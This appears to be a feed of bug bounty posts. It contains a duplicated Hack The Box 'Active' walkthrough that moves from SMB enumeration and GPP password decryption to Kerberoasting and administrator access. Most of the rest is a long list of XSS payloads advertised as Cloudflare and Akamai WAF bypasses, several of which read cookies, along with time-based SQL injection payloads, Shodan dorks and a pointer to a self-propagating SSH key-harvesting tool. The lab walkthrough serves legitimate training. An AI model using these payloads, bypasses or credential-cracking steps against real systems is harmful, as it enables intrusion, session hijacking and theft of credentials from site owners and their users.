Bug bounty Tips

Summary of My Active Machine CTF notes for 10.10.10.100 with commands and examples: 1.Nmap Scan:

   nmap -sV 10.10.10.100
   

- Identified critical ports like 53 (DNS), 88 (Kerberos), 139/445 (NetBIOS), and 389 (LDAP). 2.SMB Enumeration: - Enum4linux for detailed information:

     enum4linux -a 10.10.10.100
     

- SMBMap to check share permissions:

     smbmap -H 10.10.10.100
     

3.Access and Download from Replication Share: - Accessed via SMBClient and downloaded 'Groups.xml':

     smbclient //10.10.10.100/Replication
     smbmap -R Replication -H 
10.10.10.100 -A Groups.txt
     

4.Decrypting Password in Groups.xml: - Used gpp-decrypt for the encrypted password:

     gpp-decrypt [encrypted_password]
     

5.Utilizing Credentials: - Accessed SMB with the decrypted password:

     smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p [Decrypted_Password]
     smbclient //10.10.10.100/Users -U 'active.htb\SVC_TGS%[Decrypted_Password]'
     

6.Kerberos Ticket Extraction and Cracking: - Extracted Kerberos tickets:

     GetUserSPNs.py -request -dc-ip 10.10.10.100 'active.htb/SVC_TGS' -save -outputfile GetUserSPNs.out
     

- Cracked tickets with Hashcat:

     hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt
     

7.Root Access: - Accessed admin share and retrieved 'root.txt': ```bash smbclient //10.10.10.100/c$ -U 'active.htb\administrator%[Cracked_Password]'

summary of this machine is here

Nmap Scan: bash Copy code nmap -sV 10.10.10.100 Identified critical ports like 53 (DNS), 88 (Kerberos), 139/445 (NetBIOS), and 389 (LDAP). SMB Enumeration: Enum4linux for detailed information: bash Copy code enum4linux -a 10.10.10.100 SMBMap to check share permissions: bash Copy code smbmap -H 10.10.10.100 Access and Download from Replication Share: Accessed via SMBClient and downloaded 'Groups.xml': bash Copy code smbclient //10.10.10.100/Replication smbmap -R Replication -H 10.10.10.100 -A Groups.txt Decrypting Password in Groups.xml: Used gpp-decrypt for the encrypted password: bash Copy code gpp-decrypt [encrypted_password] Utilizing Credentials: Accessed SMB with the decrypted password: bash Copy code smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p [Decrypted_Password] smbclient //10.10.10.100/Users -U 'active.htb\SVC_TGS%[Decrypted_Password]' Kerberos Ticket Extraction and Cracking: Extracted Kerberos tickets: bash Copy code GetUserSPNs.py -request -dc-ip 10.10.10.100 'active.htb/SVC_TGS' -save -outputfile GetUserSPNs.out Cracked tickets with Hashcat: bash Copy code hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt Root Access: Accessed admin share and retrieved 'root.txt': bash Copy code smbclient //10.10.10.100/c$ -U 'active.htb\administrator%[Cracked_Pa

A new try let me know your thoughts guys

anyone playing ctf on hackthebox

Unleash Your API Potential! 🌟 Dive deep into JSON API security with our expert cheat sheet. Elevate your bug bounty game! #StayAheadOfTheCurve #APISecurityMasterclass https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-json-api-a-comprehensive-guide/api-security-cheat-sheet-part-7

Unlock the Code to Cybersecurity Mastery! 🌐✨ Dive into my top 5 strategies for becoming an industry expert. Your journey to excellence starts now!

Quick tip to find reflected xss by Coffinxp 1- python3 paramspider.py --domain domian.com 2- cat domain.com.txt | kxss | grep "< >" | tee unfiltered_param.txt 3- inject simple xss payload: "><img src=x onerror=alert("XSS")> —————————————————- Payloads 💰 <style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt${document.domain}> <marquee+loop=1+width=0+onfinish='new+Functional\ert\1\``'> <d3v/onauxclick=[2].some(confirm)>click <x onauxclick=a=alert,a(domain)>click q=1" type=image sr>c<=x one>ror<="alert> (alert') <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> (Chrome only) ?id=1&id=2 ⬇️ <input value="1,2"> ?id="&id=onpointerrawupdate="a=confirm&id=a(1) ⬇️ <input value="", onpointerrawupdate="a=confirm, a(1)"> Payload: %3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[al+ert](1)%3E%23leet%3C/marquee%3E FOR CHROME: %3Cx%20y=1%20z=%271%26apos;%27onclick=self[al%2Bert](1)%3E%23CLICK%20MEE Akamai XSS Bypass: Cloudflare XSS Bypass: <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a> <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> </ScRiPt><img src=something onauxclick="new Function al\ert\xss\``"> "><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))"> link=qwe"srcdoc="\u003ce<script%26Tab;src=//dom.xss>\u003ce</script%26Tab;e> javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><hvita onbeforetoggle="+a+b+c+" popover id=x>Hvita</hvita>") Angular 1.4.3 CSTI XSS Akamai WAF: {{([].toString()).constructor.prototype.charAt=[].join;$eval(([].toString()).constructor.fromCodePoint([120],[61],[49],[125],[125],[125],[59],[97],[108],[101],[114],[116],[40],[49],[41],[47],[47]));}} <details open ontoggle="{alert1}"></details> Cloudflare WAF Bypass - XSS (Still works - when only=1 didn’t) <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x> Midnight hunting payload: \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e Payload: <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==")> Reflected Cross-Site Scripting (XSS) and HTML Injection ## Vulnerable url :- https[:]//exampledesk[.]example[.]com/helpdesk/logon.asp?URL=%22%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E ## Vulnerable Paramter :- URL= ## Payload :- "></script><script>alert(document.cookie)</script> Yet Another Cloudflare WAF Bypass - #XSS <a"/onclick=(confirm)(origin)>Click Here! Worked for me yesterday, quite well. Another sql injection payload: 14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515 reflected XSS to RCE Payload: "><img src=x onerror=alert(whoami)> Cloudflare WAF Bypass ⚡️ <a"/onclick=(confirm)(origin)>Click Here! Time sleep sql injection ⚡️ Payload: 'XOR(if(now()=sysdate(),sleep(33),0))OR' 🔖Akamai XSS WAF Bypass ( src,svg,autofocus,iframe,img,<> ) You use this payload %22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22 CloudFlare Bypass [XSS] Payload : <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> onscrollend payload for Chrome and Firefox <xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:50px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></xss> XSS-Bypass Anatomy Final payload after working hours on a bug bounty target w/ both XSS filters & WAF: %0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>

SSH-Snake is a self-propagating, self-replicating, file-less script that automates the post-exploitation task of #SSH private key and host discovery. https://github.com/MegaManSec/SSH-Snake

In the intricate tapestry of hacking, each thread is a line of code, weaving together to form a hidden story. It's a journey through the uncharted, where curiosity meets the mastery of skill, and every challenge is a step closer to revelation

Unlocking the Secrets of Secure API Design: Discover essential strategies in our latest guide. Dive into diverse authentication methods and their security impacts. Equip yourself with the knowledge to build robust and secure APIs. #APISecurity #CybersecurityTips #TechInsights https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-json-api-a-comprehensive-guide/api-security-cheat-sheet-part-6

Level up your security game with our Upload Function Cheat Sheet! 🚀 Perfect for bug bounty hunters and cybersecurity enthusiasts looking to master the intricacies of secure file uploads. Get ready to secure your digital space! https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-json-api-a-comprehensive-guide/api-security-cheat-sheet-part-5

Some Shodan Dorks that might useful in Bug Bounty. 1. org:"http://target. com" 2. http.status:"<status_code>" 3. product:"<Product_Name>" 4. port:<Port_Number> “Service_Message” 5. port:<Port_Number> “Service_Name” 6. http.component:"<Component_Name>" 7. http.component_category:"<Component_Category> 8. http.waf:"<firewall_name>" 9. http.html:"<Name>" 10. http.title:"<Title_Name>" 11. ssl.alpn:"<Protocol>" 12. http.favicon.hash:"<Favicon_Hash>" 13. net:"<Net_Range>" (for e.g. 104.16.100.52/32) 14. http://ssl.cert.subject.cn:"<http://Domain .com>" 15. asn:"<ASnumber>" 16. hostname:"<hosthame>" 17. ip:"<IP_Address>" 18. all:"<Keyword>" 19. “Set-Cookie: phpMyAdmin” 20. “Set-Cookie: lang=" 21. “Set-Cookie: PHPSESSID" 22. “Set-Cookie: webvpn” 23. “Set-Cookie:webvpnlogin=1" 24. “Set-Cookie:webvpnLang=en” 25. “Set-Cookie: mongo-express=" 26. “Set-Cookie: user_id=" 27. “Set-Cookie: phpMyAdmin=" 28. “Set-Cookie: _gitlab_session” 29. “X-elastic-product: Elasticsearch” 30. “x-drupal-cache” 31. “access-control-allow-origin” 32. “WWW-Authenticate” 33. “X-Magento-Cache-Debug” 34. “kbn-name: kibana”

Unlock the secrets of API security with Part 4 of our API Security Cheat Sheet! 🛡️ Dive into this comprehensive guide to master JSON API techniques and fortify your web applications. Perfect for bug bounty hunters and cybersecurity enthusiasts! #APISecurity #BugBounty #JSONAPI https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-json-api-a-comprehensive-guide/api-security-cheat-sheet-part-4